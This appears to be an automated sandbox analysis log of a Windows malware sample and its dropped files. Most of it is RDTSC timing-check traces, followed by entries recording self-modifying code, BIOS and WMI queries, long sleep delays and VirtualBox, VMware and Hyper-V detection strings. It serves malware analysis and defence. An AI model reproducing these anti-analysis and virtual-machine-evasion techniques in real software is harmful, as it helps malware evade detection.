        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC52A second address: FCC53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1E3C0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC53F second address: FCC55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB8E4E1A516h 0x0000000f jmp 00007FB8E4E1A51Ch 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC6A2 second address: FCC6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB8E4E1E3B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC6AC second address: FCC6DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8E4E1A516h 0x00000008 jmp 00007FB8E4E1A525h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FB8E4E1A51Eh 0x00000015 je 00007FB8E4E1A516h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCCFC1 second address: FCCFC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCCFC5 second address: FCCFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCCFCB second address: FCD009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1E3BFh 0x00000008 jno 00007FB8E4E1E3B6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jne 00007FB8E4E1E3B6h 0x0000001c jmp 00007FB8E4E1E3BFh 0x00000021 pop ebx 0x00000022 jp 00007FB8E4E1E3B8h 0x00000028 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCD009 second address: FCD00E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCD7B8 second address: FCD7C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCD7C5 second address: FCD7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCB50C second address: FCB51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnl 00007FB8E4E1E3B6h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCB51B second address: FCB555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A528h 0x00000007 jbe 00007FB8E4E1A516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FB8E4E1A51Ah 0x00000015 jmp 00007FB8E4E1A51Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCB555 second address: FCB56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007FB8E4E1E3BEh 0x0000000e pop ebx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCB56D second address: FCB582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FD5F1A second address: FD5F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FD5F1E second address: FD5F3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1A527h 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FD595B second address: FD596E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8E4E1E3BCh 0x00000008 jo 00007FB8E4E1E3B6h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FD596E second address: FD599A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8E4E1A523h 0x0000000e jmp 00007FB8E4E1A520h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FE5829 second address: FE5842 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8E4E1E3C4h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FE5842 second address: FE5848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FE8546 second address: FE854A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FE854A second address: FE854E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FE854E second address: FE8556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F08756 second address: F0875B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F0875B second address: F08771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F08771 second address: F0879B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007FB8E4E1A516h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007FB8E4E1A546h 0x00000017 push edi 0x00000018 jmp 00007FB8E4E1A520h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FEB9FA second address: FEBA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FB8E4E1E3B6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FB8E4E1E3B6h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FEBA0E second address: FEBA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF08F3 second address: FF08F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF6149 second address: FF616E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jng 00007FB8E4E1A518h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jmp 00007FB8E4E1A523h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF83EE second address: FF8412 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8E4E1E3B6h 0x00000008 jo 00007FB8E4E1E3B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007FB8E4E1E3C1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF8412 second address: FF8432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8E4E1A529h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF8432 second address: FF8464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8E4E1E3BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FB8E4E1E3BEh 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FB8E4E1E3B6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB8E4E1E3BFh 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF8464 second address: FF8469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF9C17 second address: FF9C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF9C1B second address: FF9C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF9C1F second address: FF9C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB8E4E1E3B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF9C2B second address: FF9C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF9C31 second address: FF9C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FF9C35 second address: FF9C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB232 second address: FFB238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB238 second address: FFB245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FB8E4E1A516h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB245 second address: FFB259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB259 second address: FFB264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB264 second address: FFB281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FB8E4E1E3C0h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB281 second address: FFB2A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1A528h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FFB2A2 second address: FFB2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB8E4E1E3BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F127C1 second address: F127D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB8E4E1A51Bh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1009608 second address: 1009613 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FB8E4E1E3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10098E8 second address: 1009907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1A525h 0x00000009 jg 00007FB8E4E1A516h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1009A52 second address: 1009A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1009A58 second address: 1009A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1009BB8 second address: 1009BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 100A73E second address: 100A754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB8E4E1A516h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 popad 0x00000012 push ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 100D8D1 second address: 100D8D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 100D430 second address: 100D436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 100D436 second address: 100D43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1010EE4 second address: 1010EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10124A5 second address: 10124AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10124AB second address: 10124B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB8E4E1A516h 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10124B6 second address: 10124CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB8E4E1E3C1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10315B9 second address: 10315C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10315C4 second address: 10315CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8E4E1E3B6h 0x0000000a pop edi 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10307E6 second address: 10307F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB8E4E1A516h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10307F5 second address: 1030822 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FB8E4E1E3D5h 0x00000012 jmp 00007FB8E4E1E3C9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 103098F second address: 10309A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10309A9 second address: 10309B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10309B1 second address: 10309B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10309B5 second address: 10309B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1030C84 second address: 1030C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1031168 second address: 103117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10312FB second address: 10312FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 10312FF second address: 1031319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1031319 second address: 103131F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 103131F second address: 1031324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1031324 second address: 103132A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1034455 second address: 103447C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C4h 0x00000009 pop esi 0x0000000a jmp 00007FB8E4E1E3BEh 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 103447C second address: 1034486 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1A51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1035681 second address: 1035686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: 1035686 second address: 103568C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSpecial instruction interceptor: First address: DA9A52 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSpecial instruction interceptor: First address: F4EA3F instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeMemory allocated: 52F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeMemory allocated: 5560000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeMemory allocated: 52F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWindow / User API: threadDelayed 3902Jump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 4364Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406301 FindFirstFileW,FindClose,1_2_00406301
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406CC7
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000002.1747886194.0000000000F26000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
        Source: Set-up.exe.0.drBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
        Source: vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vmware
        Source: Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 7144 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6268 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6444 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6640 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6876 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6956 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6208 }, { "name": "blhNatbBSsEYSdWeJJQ
        Source: Set-up.exeBinary or memory string: Hyper-V RAW
